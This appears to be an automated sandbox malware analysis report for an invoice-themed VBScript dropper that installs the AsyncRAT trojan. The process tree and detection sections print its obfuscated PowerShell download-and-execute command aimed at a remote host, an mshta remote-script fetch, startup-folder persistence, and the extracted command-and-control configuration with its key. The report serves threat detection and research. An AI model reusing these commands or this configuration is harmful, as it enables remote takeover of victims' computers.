Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Invoice-ID-(882451).vbs

Overview

General Information

Sample Name:Invoice-ID-(882451).vbs
Analysis ID:359309
MD5:3e338fb0311a9808b97c27f9427ba6fe
SHA1:9b65363cecd8bec73dcce9501f04a62feeeab228
SHA256:a517730f91314aaaf2e7843327e8a1d7c09b8e542449152a2725f2d4361b8bb3
Tags:vbs
Infos:

Most interesting Screenshot:

Detection

AsyncRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: Drops script at startup location
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected obfuscated html page
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5924 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice-ID-(882451).vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • mshta.exe (PID: 1424 cmdline: 'C:\Windows\System32\mshta.exe' http://ahmedadel.work/cairo/Encoding.txt MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
      • powershell.exe (PID: 1320 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 2932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 2240 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\Microsoft.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
  • mshta.exe (PID: 1260 cmdline: 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 7083239CE743FDB68DFC933B7308E80A)
    • powershell.exe (PID: 5764 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file 'C:\Users\Public\Microsoft.ps1 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: AsyncRAT

{"Server": "clayroot2016.linkpc.net", "Ports": "6666", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "e4Fpuk1cJ5OkC7E8UIORFI08LAwSyWpN", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE5DCCAsygAwIBAgIQAM6aeObxtwfNbsaBGgwvITANBgkqhkiG9w0BAQ0FADATMREwDwYDVQQDDAhDTEFZUk9PVDAgFw0yMDEyMjMxNDAxNDhaGA85OTk5MTIzMTIzNTk1OVowEzERMA8GA1UEAwwIQ0xBWVJPT1QwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCMnD5hud3pDOqRWniQe2DXWCO1sRYJshba7IuVlx05vDvPJsAapNSw2Nhf06qsul3ytxXnfwAkSTVj08VRzS6k9aMAUERY5U5Y9Gg+9Ms8HhIGkmt8+S7GjgyjfyK0RCzN1izabH3/N1aaNYOGFKZlhZ6N90HvncLssktmsJcicXGShO0TBOlNn+xYJVsESK8EiGjqNGY+2FshNqzpAxD7gTwswZkclc8j59nyBPziJrG6EHDfEjDSVtj5Vs+XgyW8iczbs4vFuoZILr+pK9ggzgfMGxJlZIxhbtclDs1oEyZX1l7IkncyU4U7rAByb23+IXdezpMLKmcMhuMjOtp4UIzClVGT1XnaVFhqI+RjPFF4PfPXz5VbzynVMuMJaEKNLhvyVbFYrWIKwt8clYEWA9X+zSKLZVeaL/0J8gERo3zZMcwyR8Mq4xXoaw4Cd+D8M6DQRnihe6Zd4wtiSRusCxnEYflQ/U8Vo+uzjKK8zmxV3iG0THPtQR4N8inMk3L7KKfJ5pfKlf7Orp+cKkF8u+IAJR3bzx340WRtKfXQz26/7XOErfLLWw1tVaTo32vNwBgf+JnboinWamzumfq4ZB3ipY2zdZnY0B/cGR9Bge/Tv9b0UBv5CapQQmHNN83/WxzocCNH5cBmbJoSbhLRvBzT6GLdk4HGPmb0ACFMtQIDAQABozIwMDAdBgNVHQ4EFgQUf7hxtsn3ft2a5FcQnKF5DoPGjSUwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAHLfov+ONLDTfwUkSn9letzBQAMBKCloP2+r5EbaXutLg+m2l3k1N95me6tMphieXaWOWCtH8o85PbtkZAvwQSdD87EuQ2MDcVRsUW8phl66aDhEY85MkvAkiuzo6LScMLPDE7cAcNsp19+F51EowaVkoO2sAGf4oYqRlK2DGTlEsQfL7Wd+nK5x79SyJqjAZXBozIfuNB2fSc6K17ALfI9CHa7GnnG0sd7nD6nVmKJhuohmnktlEjD/UHiRfRVEORzNMc+oDfuIX4A+wg7XMkh/27KPTHhdeEcDhimOcqeNPrhIfeJNePnXC5YbmYNm2cjU6dMuZkAl3A/t0c5I8R0YSRY2L1lPTDhMf70e3KqLKtH68Xw1KZ8GtChyXfeU79nlQzShnR2ujUI6cXl3fCl5NGbNxKYiOcoIyCQpWb01sUPlKiZC/7lPTC+k38tgdVWMBMwWv0BC27uU1ePVUweYAcrSi0zqtAJQWjO1GLLZSJtcIr2D7YlKAc17UrgxzyJc0oDykadV9pxaJ8kL++k+JSTWQwsv7lG+HublfVCq7mUK+mT23rwpEm9ZKoq+x0kYBVSSxZK6SDsmtaOWi8D4IB5v1QZTSxo8YDWte5TKYY2dUbRFbm0mc+5hNiRH/GimPnikS/bY5EbrhWVdckpqRGeEQ3QwEIASETnNZvmE=", "ServerSignature": "KzpgsBOvLeWLHCXAcRuU5kbQnhjmHZAyQhuTWuXFcOS8V1RcXc5vEkWtO+uYsgNacTXqYBjz6Tg5G4cfnpHl57u9f58i9DYnvgZw1uSdAWg1LKsP9wsjOu4x7NpqRrn/wBtz0T/tZZ6VPxeKRrr9NvW6jQ48KLy1FtNrNGH03a86UHTLxGac+5VUMWRB/aHQB5VZCs++V29djw+tF9ugP5r9y4EZsdPPW2zsHXG3v5g0LMwr3SsZq0U7wQm0nJ3HKmGOKx3WXsJoESqFwSl9TAZKM5qshl1cFGp6upVxuZgUItoZY/m3Sp6cvHwaOH47uNMHuTOVZrzA3r2giOyY+oYacLewGTubDRh74XeoUAsfeXdhPkFQAqqPy0Po4g5gX3kZAwmh1aoQ4zQak/96Yem6R8Xw2/fEQJNNKGe9Thwa7y5b5kkOvMRJb4OfwIOkI/Hi0G4Va/14VKMQKWApZdJ/75nF41lCpi9i2p26F5QWpvBj/o7o7133IqQBDQkS5bPtFlnGvNDEIOfL1AruDVSmefuOVtTT0glN8YPDyYgeQhfNuMy9Dc83o1A1YS+eRU/nQpfkfFoKvjwkAhx8EMln0jrCg5rMUBMkcI9QE/jRxS6jlE0J4ZmTcjGtMDcpwCTnenBuZM6GLym+mqQNMF1S9eYNcV0tE5Gbkej/xKE=", "Group": "Default"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapSUSP_PS1_FromBase64String_Content_IndicatorDetects suspicious base64 encoded PowerShell expressionsFlorian Roth
  • 0xa93ae:$: ::FromBase64String('TVq

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    C:\Users\Public\Microsoft.ps1SUSP_PS1_FromBase64String_Content_IndicatorDetects suspicious base64 encoded PowerShell expressionsFlorian Roth
    • 0x1c:$: ::FromBase64String('TVq

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000003.745729144.0000000005ADD000.00000004.00000001.sdmpSUSP_PS1_FromBase64String_Content_IndicatorDetects suspicious base64 encoded PowerShell expressionsFlorian Roth
    • 0x318:$: ::FromBase64String('TVq
    00000005.00000002.906772895.0000000006182000.00000004.00000001.sdmpSUSP_PS1_FromBase64String_Content_IndicatorDetects suspicious base64 encoded PowerShell expressionsFlorian Roth
    • 0x5540:$: ::FromBase64String('TVq
    00000009.00000002.901879167.0000000000402000.00000040.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmpSUSP_PS1_FromBase64String_Content_IndicatorDetects suspicious base64 encoded PowerShell expressionsFlorian Roth
      • 0x1cde:$: ::FromBase64String('TVq
      00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        Click to see the 7 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.3.powershell.exe.5bcd1ec.1.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          10.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            5.2.powershell.exe.b670778.7.raw.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              5.2.powershell.exe.b6827bc.6.raw.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                9.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  Click to see the 3 entries

                  Sigma Overview

                  System Summary:

                  barindex
                  Sigma detected: Drops script at startup locationShow sources
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1320, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta
                  Sigma detected: MSHTA Spawning Windows ShellShow sources
                  Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X, CommandLine|base64offset|contains: ", Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' http://ahmedadel.work/cairo/Encoding.txt, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1424, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://ahmedadel.work/cairo/ALL.txt'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X, ProcessId: 1320

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "clayroot2016.linkpc.net", "Ports": "6666", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "e4Fpuk1cJ5OkC7E8UIORFI08LAwSyWpN", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE5DCCAsygAwIBAgIQAM6aeObxtwfNbsaBGgwvITANBgkqhkiG9w0BAQ0FADATMREwDwYDVQQDDAhDTEFZUk9PVDAgFw0yMDEyMjMxNDAxNDhaGA85OTk5MTIzMTIzNTk1OVowEzERMA8GA1UEAwwIQ0xBWVJPT1QwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCMnD5hud3pDOqRWniQe2DXWCO1sRYJshba7IuVlx05vDvPJsAapNSw2Nhf06qsul3ytxXnfwAkSTVj08VRzS6k9aMAUERY5U5Y9Gg+9Ms8HhIGkmt8+S7GjgyjfyK0RCzN1izabH3/N1aaNYOGFKZlhZ6N90HvncLssktmsJcicXGShO0TBOlNn+xYJVsESK8EiGjqNGY+2FshNqzpAxD7gTwswZkclc8j59nyBPziJrG6EHDfEjDSVtj5Vs+XgyW8iczbs4vFuoZILr+pK9ggzgfMGxJlZIxhbtclDs1oEyZX1l7IkncyU4U7rAByb23+IXdezpMLKmcMhuMjOtp4UIzClVGT1XnaVFhqI+RjPFF4PfPXz5VbzynVMuMJaEKNLhvyVbFYrWIKwt8clYEWA9X+zSKLZVeaL/0J8gERo3zZMcwyR8Mq4xXoaw4Cd+D8M6DQRnihe6Zd4wtiSRusCxnEYflQ/U8Vo+uzjKK8zmxV3iG0THPtQR4N8inMk3L7KKfJ5pfKlf7Orp+cKkF8u+IAJR3bzx340WRtKfXQz26/7XOErfLLWw1tVaTo32vNwBgf+JnboinWamzumfq4ZB3ipY2zdZnY0B/cGR9Bge/Tv9b0UBv5CapQQmHNN83/WxzocCNH5cBmbJoSbhLRvBzT6GLdk4HGPmb0ACFMtQIDAQABozIwMDAdBgNVHQ4EFgQUf7hxtsn3ft2a5FcQnKF5DoPGjSUwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQ0FAAOCAgEAHLfov+ONLDTfwUkSn9letzBQAMBKCloP2+r5EbaXutLg+m2l3k1N95me6tMphieXaWOWCtH8o85PbtkZAvwQSdD87EuQ2MDcVRsUW8phl66aDhEY85MkvAkiuzo6LScMLPDE7cAcNsp19+F51EowaVkoO2sAGf4oYqRlK2DGTlEsQfL7Wd+nK5x79SyJqjAZXBozIfuNB2fSc6K17ALfI9CHa7GnnG0sd7nD6nVmKJhuohmnktlEjD/UHiRfRVEORzNMc+oDfuIX4A+wg7XMkh/27KPTHhdeEcDhimOcqeNPrhIfeJNePnXC5YbmYNm2cjU6dMuZkAl3A/t0c5I8R0YSRY2L1lPTDhMf70e3KqLKtH68Xw1KZ8GtChyXfeU79nlQzShnR2ujUI6cXl3fCl5NGbNxKYiOcoIyCQpWb01sUPlKiZC/7lPTC+k38tgdVWMBMwWv0BC27uU1ePVUweYAcrSi0zqtAJQWjO1GLLZSJtcIr2D7YlKAc17UrgxzyJc0oDykadV9pxaJ8kL++k+JSTWQwsv7lG+HublfVCq7mUK+mT23rwpEm9ZKoq+x0kYBVSSxZK6SDsmtaOWi8D4IB5v1QZTSxo8YDWte5TKYY2dUbRFbm0mc+5hNiRH/GimPnikS/bY5EbrhWVdckpqRGeEQ3QwEIASETnNZvmE=", "ServerSignature": "KzpgsBOvLeWLHCXAcRuU5kbQnhjmHZAyQhuTWuXFcOS8V1RcXc5vEkWtO+uYsgNacTXqYBjz6Tg5G4cfnpHl57u9f58i9DYnvgZw1uSdAWg1LKsP9wsjOu4x7NpqRrn/wBtz0T/tZZ6VPxeKRrr9NvW6jQ48KLy1FtNrNGH03a86UHTLxGac+5VUMWRB/aHQB5VZCs++V29djw+tF9ugP5r9y4EZsdPPW2zsHXG3v5g0LMwr3SsZq0U7wQm0nJ3HKmGOKx3WXsJoESqFwSl9TAZKM5qshl1cFGp6upVxuZgUItoZY/m3Sp6cvHwaOH47uNMHuTOVZrzA3r2giOyY+oYacLewGTubDRh74XeoUAsfeXdhPkFQAqqPy0Po4g5gX3kZAwmh1aoQ4zQak/96Yem6R8Xw2/fEQJNNKGe9Thwa7y5b5kkOvMRJb4OfwIOkI/Hi0G4Va/14VKMQKWApZdJ/75nF41lCpi9i2p26F5QWpvBj/o7o7133IqQBDQkS5bPtFlnGvNDEIOfL1AruDVSmefuOVtTT0glN8YPDyYgeQhfNuMy9Dc83o1A1YS+eRU/nQpfkfFoKvjwkAhx8EMln0jrCg5rMUBMkcI9QE/jRxS6jlE0J4ZmTcjGtMDcpwCTnenBuZM6GLym+mqQNMF1S9eYNcV0tE5Gbkej/xKE=", "Group": "Default"}
                  Source: 10.2.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                  Source: 9.2.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen

                  Phishing:

                  barindex
                  Yara detected obfuscated html pageShow sources
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.hta, type: DROPPED

                  Compliance:

                  barindex
                  Uses insecure TLS / SSL version for HTTPS connectionShow sources
                  Source: unknownHTTPS traffic detected: 207.241.228.153:443 -> 192.168.2.4:49715 version: TLS 1.0
                  Binary contains paths to debug symbolsShow sources
                  Source: Binary string: HBAR.pdb81 source: powershell.exe, 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp
                  Source: Binary string: HBAR.pdb source: powershell.exe, 00000005.00000002.912905645.000000000B2F1000.00000004.00000001.sdmp
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior

                  Networking:

                  barindex
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorURLs: clayroot2016.linkpc.net
                  Source: global trafficTCP traffic: 192.168.2.4:49725 -> 193.23.3.13:6666
                  Source: global trafficHTTP traffic detected: GET /cairo/ALL.txt HTTP/1.1Host: ahmedadel.workConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cairo/Server.txt HTTP/1.1Host: ahmedadel.workConnection: Keep-Alive
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: global trafficHTTP traffic detected: GET /cairo/Encoding.txt HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ahmedadel.workConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 207.241.228.153:443 -> 192.168.2.4:49715 version: TLS 1.0
                  Source: global trafficHTTP traffic detected: GET /cairo/Encoding.txt HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ahmedadel.workConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cairo/ALL.txt HTTP/1.1Host: ahmedadel.workConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cairo/Server.txt HTTP/1.1Host: ahmedadel.workConnection: Keep-Alive
                  Source: unknownDNS traffic detected: queries for: ahmedadel.work
                  Source: powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmpString found in binary or memory: http://ahmedadel.work
                  Source: PowerShell_transcript.642294.nqkS_Vsp.20210227191803.txt.2.drString found in binary or memory: http://ahmedadel.work/cairo/ALL.txt
                  Source: mshta.exe, 00000001.00000002.651515709.000002454F74E000.00000004.00000001.sdmp, mshta.exe, 00000001.00000002.652619299.0000024D52298000.00000004.00000001.sdmp, Encoding[1].txt.1.drString found in binary or memory: http://ahmedadel.work/cairo/ALL.txt%27%27%29%27%3B%24TC%3DI%60E%60X%20%28%24c1%2C%24c4%2C%24c3%20-Jo
                  Source: powershell.exe, 00000002.00000002.908984002.000001DEA67A2000.00000004.00000001.sdmpString found in binary or memory: http://ahmedadel.work/cairo/ALL.txtX
                  Source: mshta.exe, 00000001.00000002.651515709.000002454F74E000.00000004.00000001.sdmpString found in binary or memory: http://ahmedadel.work/cairo/ALm
                  Source: wscript.exe, 00000000.00000002.637630976.000001CFFBA2B000.00000004.00000040.sdmp, wscript.exe, 00000000.00000002.637626504.000001CFFBA25000.00000004.00000040.sdmp, wscript.exe, 00000000.00000003.637008090.000001CFFD227000.00000004.00000001.sdmp, mshta.exe, 00000001.00000002.653067114.0000024D52ADB000.00000004.00000001.sdmp, mshta.exe, 00000001.00000002.651459548.000002454F711000.00000004.00000020.sdmp, mshta.exe, 00000001.00000002.651331087.000002454F660000.00000004.00000020.sdmp, mshta.exe, 00000001.00000002.651499116.000002454F73A000.00000004.00000020.sdmp, mshta.exe, 00000001.00000002.651349643.000002454F676000.00000004.00000020.sdmp, mshta.exe, 00000001.00000002.651380882.000002454F69B000.00000004.00000020.sdmp, Invoice-ID-(882451).vbsString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txt
                  Source: mshta.exe, 00000001.00000002.651474574.000002454F71E000.00000004.00000020.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txt...
                  Source: mshta.exe, 00000001.00000002.651474574.000002454F71E000.00000004.00000020.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txt...s
                  Source: wscript.exe, 00000000.00000003.637242970.000001CFFB729000.00000004.00000001.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txt0
                  Source: mshta.exe, 00000001.00000002.651499116.000002454F73A000.00000004.00000020.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txt7
                  Source: wscript.exe, 00000000.00000003.637263450.000001CFFB734000.00000004.00000001.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txt?
                  Source: mshta.exe, 00000001.00000002.651459548.000002454F711000.00000004.00000020.sdmp, mshta.exe, 00000001.00000002.651331087.000002454F660000.00000004.00000020.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtC:
                  Source: mshta.exe, 00000001.00000002.651380882.000002454F69B000.00000004.00000020.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtH
                  Source: mshta.exe, 00000001.00000002.651331087.000002454F660000.00000004.00000020.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtHmw
                  Source: mshta.exe, 00000001.00000003.643767843.0000024D52A83000.00000004.00000001.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtLMEMX
                  Source: mshta.exe, 00000001.00000002.651705439.000002454F8C0000.00000004.00000040.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtPROFILE_Sxf
                  Source: wscript.exe, 00000000.00000003.637263450.000001CFFB734000.00000004.00000001.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtY
                  Source: wscript.exe, 00000000.00000002.637433590.000001CFFB767000.00000004.00000001.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtf
                  Source: mshta.exe, 00000001.00000003.643922704.0000024D52395000.00000004.00000001.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txthttp://ahmedadel.work/cairo/Encoding.txt
                  Source: mshta.exe, 00000001.00000002.651371236.000002454F695000.00000004.00000020.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtionalmw
                  Source: mshta.exe, 00000001.00000002.651371236.000002454F695000.00000004.00000020.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtndows
                  Source: mshta.exe, 00000001.00000002.651371236.000002454F695000.00000004.00000020.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtndowsINetCookies
                  Source: mshta.exe, 00000001.00000002.651380882.000002454F69B000.00000004.00000020.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Encoding.txtt
                  Source: powershell.exe, 00000002.00000003.711702322.000001DEA4186000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.910463115.000001DEA6A77000.00000004.00000001.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Server.txt
                  Source: powershell.exe, 00000002.00000002.909879303.000001DEA6964000.00000004.00000001.sdmpString found in binary or memory: http://ahmedadel.work/cairo/Server.txtX
                  Source: powershell.exe, 00000002.00000002.909554931.000001DEA68B8000.00000004.00000001.sdmpString found in binary or memory: http://ahmedadel.workx
                  Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/0
                  Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
                  Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
                  Source: powershell.exe, 00000002.00000002.917246236.000001DEBE1C5000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.903747376.0000000003336000.00000004.00000020.sdmp, aspnet_compiler.exe, 00000009.00000003.721271380.0000000005159000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdig2s1-1597.crl0
                  Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
                  Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
                  Source: aspnet_compiler.exe, 00000009.00000003.720499361.000000000514E000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                  Source: aspnet_compiler.exe, 00000009.00000003.720499361.000000000514E000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/7
                  Source: 77EC63BDA74BD0D0E0426DC8F8008506.9.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: powershell.exe, 00000002.00000002.910338549.000001DEA6A4C000.00000004.00000001.sdmpString found in binary or memory: http://ia801503.us.archive.org
                  Source: powershell.exe, 00000002.00000002.915900711.000001DEB5C72000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/0
                  Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/02
                  Source: powershell.exe, 00000002.00000003.711520802.000001DEBE2B7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
                  Source: powershell.exe, 00000002.00000002.917186570.000001DEBE16A000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.905662877.000001DEA5E21000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000002.00000002.905111532.000001DEA5C11000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.906066406.0000000005121000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.906122785.000002AA66FB1000.00000004.00000001.sdmp, aspnet_compiler.exe, 00000009.00000002.904887989.0000000002C01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
